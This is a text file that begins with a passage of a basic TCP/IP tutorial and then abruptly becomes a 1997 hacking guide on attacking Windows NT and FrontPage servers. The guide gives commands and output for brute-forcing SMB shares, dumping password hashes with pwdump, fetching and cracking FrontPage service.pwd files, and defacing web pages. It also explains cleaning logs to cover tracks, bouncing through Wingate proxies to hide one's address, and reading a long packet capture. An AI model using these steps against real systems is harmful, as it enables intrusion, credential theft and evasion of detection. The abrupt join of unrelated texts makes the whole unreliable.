the Internet travels through IP packets, the basic unit of IP transmissions.
IP is termed a connectionless, unreliable protocol, since IP does not
exchange control information before transmitting data to a remote system,
the packets are merely sent to the destination with the expection that they
will be treated properly. IP is unreliable because it does not retransmit
lost packets or detect corrupted data. IP depends upon the upper level
protocols such as TCP or UDP to do this.
IP defines a universal addressing scheme called IP addresses. An IP
address is a 32-bit number, and each standard address is unique on the
Internet. Given an IP packet, the information can be routed to the
destination based upon the IP address defined in the packet header. IP
addresses are generally written as four numbers, between 0 and 255, separated
by a period (i.e. 168.143.27.120)
While the 32 bit number is an appropriate way to address systems for
computers, humans understandably have difficulty remembering them. Thus, the
Domain Name System (DNS) was developed to map IP addresses to their
corresponding domain names, and vice versa. Thus mulder.clark.net is the
same thing as 168.143.27.120, and 168.143.27.120 is the same thing as
mulder.clark.net .
It is very important to realize that these domain names are not used
or understood by IP at all. When an application wants to transmit data to
another machine, it must first translate the domain name to an IP address
using DNS. The receiving application must then use DNS to return a domain
name into its IP address. There is not a one to one correspondence between
IP addresses and domain names, a domain name can map to multiple IP addresses
and multiple IP addresses can map to the same domain name.
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The Transmission Control Protocol (TCP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Most Internet applications and services use the Transport Control
Protocol (TCP) to implement the transport layer. TCP provides a reliable,
connection-oriented, continuous-stream protocol. The implications of these
characteristics are:
o Reliable: When TCP segments, the smallest unit of a TCP transmission
are lost or interupted, the TCP implentation will detect this and
retransmit necessary segments.
o Connection-oriented: TCP sets up a connection with a remote system
by transmitting control information, often known as a handshake,
before beginning a communication. At the end of the connect, a
similar closing handshake it performed to end the transmission.
o Continous-stream: TCP provides a communications medium that allows
for an arbitrary number of bytes to be sent and received smoothly;
once a connection has been established, TCP segments provide the
application layer the appearance of a continous flow of data.
It is because of these characteristics, that it is easy to see why TCP
would be used by most Internet application and services. TCP makes it very
easy to create a network application, freeing you from worrying how the data
is broken up, or about coding correction routines. However, TCP requires a
significant amount of overhead, and retransmission of lost data may not be
required, because the information could have expired, thus making UDP the
popular choice for more simple applications and services.
Below is a chart, comparing TCP to both UDP and IP, showing strengths
and weaknesses.
ÚÄÄÄÄÄÂÄÄÄÄÄÂÄÄÄÄÄ¿
³ IP ³ UDP ³ TCP ³
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ connection-oriented ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ message boundaries ³ yes ³ yes ³ no ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ data checksum ³ no ³ opt ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ positive ack. ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ timeout and rexmit ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ duplicate detection ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ sequencing ³ no ³ no ³ yes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄ´
³ flow control ³ no ³ no ³ yes ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÙ
An important addressing scheme which TCP defines is the port. Ports
are used to separate various TCP communications streams that are running
concurrently on the same system. For server applications, which wait for TCP
clients to initiate contact, a specific port can be established from where
communications will originate. These concepts all come together in a
programming abstraction known as sockets. TCP socket basics will be covered
later on.
The diagrams below show you how TCP makes a connection. TCP using
something called a three way handshake. Basically, the server is always
running, and waits for clients to starts the connection. The client passes a
SYN (synchronous) that is randomly generated. The sever replies with an ACK
(acknowledgment), which is the SYN the client generated plus 1. The server
also sends a SYN (randomly generated) back to the client. The client then
responds with and ACK, which is the server's SYN plus 1. The connection is
now established.
Client Server
Generate x -------- SYN(x) ---------> Receive SYN(x)
Generate y
Receive SYN(y) <--- ACK(x+1)/SYN(y) ---- Send ACK(x+1)
and ACK(x+1) and SYN(y)
Send ACK(y+1) -------- ACK(y+1) -------> Receive ACK(y+1)
Connection Established
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The User Datagram Protocol (UDP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
UDP is a low overhead alternative to TCP for host to host
communications. In contrast to TCP, UDP has the following characteristics:
o Unreliable: UDP has no mechanisms for detecting errors, nor
retransmitting lost or corrupted information.
o Connectionless: UDP does not negotiate a connection before
transmitting data. Information is sent with the assumption that
the recipient will be listening.
o Message-oriented: UDP allows applications to send self-contained
messages within UDP datagrams, the unit of UDP transmissions. The
application must package all information within individual
datagrams.
For some applications, UDP is a more fitting protocol than TCP. For
time protocols, lost data indicating the current time would be invalid and
outdated by the time that it was retransmitted. Another example is NFS, the
Network File System can operate more efficently and provide more reliablity
at the application layer, and thusly uses UDP.
As with TCP, UDP provides the addressing scheme of ports, allowing
for many applications to simultaneously send and receive datagrams. UDP ports
are distinct from TCP ports. For example, one application can respond to the
UDP port 512 while another unrelated service handles TCP port 512. To see
which ports use which protocol and service, look at a copy of /etc/services,
available with any UNIX box.
[Windows NT Vulnerability Theories Version 2...........................vacuum]
==========Windows NT Vulnerability Theories Version 2=============
by Vacuum & Chame|eon of Rhino9
[www.rhino9.org is coming]
[http://www.technotronic.com -- vacuum@technotronic.com]
December 04, 1997
Look for a NT Security Suite to be released by Rute soon based on the theories
mentioned in this text.
Special thanks to NeonSurge creator of rhino9, l0pht for l0phtcrack 1.5,
Jeremy Allison for pwdump, Andrew Tridgell for NAT and SAMBA, CyberToast,
Darkling, Rute, pSId for coding a linux version, and Microsoft for creating tools
that have nice holes in them.
All mentioned programs available at www.technotronic.com
This r9-nt-v2.zip includes:
vacuum.txt This text file.
vac1.cap Network Monitor packet sniffing sessions in
native format.This capture is a frontpage hack
session.
sniff.txt ASCII version which highlighs the which does not
require Network Monitor to be read as well as
Highlights the vac1.cap session.
service.pwd-scanner.c Scan for frontpage extsension serrvice.pwd file
for use on Linux based machines.
dnscan lists all servers in a particular domain and can
be used as an input file for service.pwd-scanner.
datapipe.c datapipe is similar to bounce.c
gcc -o datapipe datapipe.c
chmod 755 datapipe
./datapipe 2222 23 www.target.com
where 2222 is the source port
and 23 is the destination port for frontpage attack
this would be 80
If any programmers want to go HARDCORE with me, I have setup the appropriate
symbol files installed as well as the capability of running a "remote" debug
through the modem to share my ideas/theories.
==========NetBIOS Attack Program==================================
Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,
NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
OPTIONS
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
Note that NAT.EXE will ip scan for netbios shares as performed above.
Comparing NAT.EXE to Microsoft's own executables:
C:\nbtstat -A 204.73.131.11
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client
C:\net view 204.73.131.11
Shared resources at 204.73.131.11
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\204.73.131.11\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\204.73.131.11\test Microsoft Windows Network
OK \\204.73.131.11\test Microsoft Windows Network
The command completed successfully.
C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If Default share of Everyone/Full Control. Done it is hacked.
==========Frontpage Extension Scanner & Cracker========================
C:\pwdump 204.73.131.11
NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password".
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
The #haccess.ctl file:
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows frontpage server extensions to be installed on
port 443 (HTTPS)Secure Sockets Layer
port 80 (HTTP)
NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
instead of Frontpage.
The following is a list of the Internet Information server files location
in relation to the local hard drive (C:) and the web (www.target.com)
C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
NOTE: If Index Information Server running under Internet Information Server.
service.pwd is our goal, although lots of servers are not password protected
and can be exploited easily. queryhit.htm if found can be used to get service.pwd
search for
"#filename=*.pwd"
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
NOTE: Name and password are case sensitive
Scanning PORT 80 or 443 options:
GET /_vti_inf.html #Ensures that frontpage server extensions
are installed.
GET /_vti_pvt/service.pwd #Contains the encrypted password files.
Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted
names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log #If author.log is there it will need to
be cleaned to cover your tracks
GET /samples/search/queryhit.htm # If service.pwd is obtained it will look
similar to this:
Vacuum:SGXJVl6OJ9zkE
The above password is apple
Turn it into DES format:
Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
and save it as service.txt
The run your favorite unix password cracker like John The Ripper
C:\john -w:dictionary.txt service.txt
Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
-wordfile:<file> specify wordlist file
-restore[:<file>] restore session [from <file>]
-user:login|uid[,..] only crack this (these) user(s)
-timeout:<time> abort session after a period of <time> minutes
-incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
-single single crack mode
-stdin read words from stdin
-list list each word
-test perform a benchmark
-beep beep when a password is found
-quiet do not beep when a password is found (default)
-noname don't use memory for login names
Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
To open a FrontPage web
On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage
Web and choose the FrontPage web you want to open.
Click More Webs if the web you want to open is not listed.
Click OK.
If you are prompted for your author name and password, you will have
to decrypt service.pwd, guess or move on.
Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.
I have captured the entire hack from connection, to password authentication,
to the actual page upload.
To view this file, you will need to use Windows NT's Network monitor
and open the file vac.cap
=====Wingate Scanner =======================================================
step 1.
Use WS_Ping Pro or Domscan to scan a ip address range looking for
xxx.xxx.xxx.xxx port 23 or port 1080
1080 is the socks port for wingate.
23 is of course the telnet port
step 2.
telnet to port 23 on found targets to see if you get a prompt like this
Wingate>
To Bounce on to another server
Wingate>www.target.com 23
or whatever port you want to connect to
(This would be a good way to mask your original ip address when setting up
bounce.c on a unix shell)
=====Sniffing ==============================================================
Running a packet sniffer to see the actual determining of shares:
NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..)
This frame is a NetShareEnum request, which requests a list of shared resources.
19 31.348 STUDENT7 *SMBSERVER R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) STUDENT7 *SMBSERVER IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.18
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 19
FRAME: Total frame length: 238 bytes
FRAME: Capture frame length: 238 bytes
FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C9D
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 238 (0x00EE)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
IP: ID = 0x1A08; Proto = TCP; Len: 224
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 224 (0xE0)
IP: Identification = 6664 (0x1A08)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x415E
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.11
IP: Data: Number of data bytes remaining = 204 (0x00CC)
TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session)
TCP: Source Port = 0x0728
TCP: Destination Port = NETBIOS Session Service
TCP: Sequence Number = 73409249 (0x46022E1)
TCP: Acknowledgement Number = 1505236 (0x16F7D4)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8278 (0x2056)
TCP: Checksum = 0x40ED
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 184 (0x00B8)
NBT: SS: Session Message, Len: 180
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 180 (0xB4)
NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
SMB: C transact TransactNmPipe, FID = 0x800
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 192 (0xC0)
SMB: Flags Summary = 24 (0x18)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 0....... = Client command
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 16
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 96
SMB: Max parm bytes = 0
SMB: Max data bytes = 1024
SMB: Max setup words = 0 (0x0)
SMB: Transact Flags Summary = 0 (0x0)
SMB: ...............0 = Leave session intact
SMB: ..............0. = Response required
SMB: Transact timeout = 0 (0x0)
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 84 (0x54)
SMB: Data bytes = 96 (0x60)
SMB: Data offset = 84 (0x54)
SMB: Max setup words = 2
SMB: Setup words
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: File ID (FID) = 2048 (0x800)
SMB: Byte count = 113
SMB: Byte parameters
SMB: File name = \PIPE\
SMB: Transaction data
SMB: Data: Number of data bytes remaining = 96 (0x0060)
MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 96 (0x60)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 17 (0x11)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 72 (0x48)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
MSRPC: Stub Data
R_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
R_SRVSVC: DWORD Level = 1 (0x1)
R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
R_SRVSVC: Switch Value = 1 (0x1)
R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
R_SRVSVC: DWORD EntriesRead = 0 (0x0)
R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)
00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49 ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18 ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00 V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00 .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54 ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00 .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00 P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00 ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00 ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00 ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 ..............
This is the response to the above share request:
27 31.376 *SMBSERVER STUDENT7 R_SRVSVC RPC Server response srvsvc:NetrServerGetInfo(..) *SMBSERVER STUDENT7 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 3, 1997 9:12:54.46
FRAME: Time delta from previous physical frame: 7 milliseconds
FRAME: Frame number: 27
FRAME: Total frame length: 230 bytes
FRAME: Capture frame length: 230 bytes
FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C9D
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 230 (0x00E6)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
IP: ID = 0x3C0E; Proto = TCP; Len: 216
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 216 (0xD8)
IP: Identification = 15374 (0x3C0E)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x1F60
IP: Source Address = 204.73.131.11
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 196 (0x00C4)
TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832
TCP: Source Port = NETBIOS Session Service
TCP: Destination Port = 0x0728
TCP: Sequence Number = 1506074 (0x16FB1A)
TCP: Acknowledgement Number = 73409903 (0x460256F)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 7314 (0x1C92)
TCP: Checksum = 0x7C1E
TCP: Urgent Pointer = 0 (0x0)
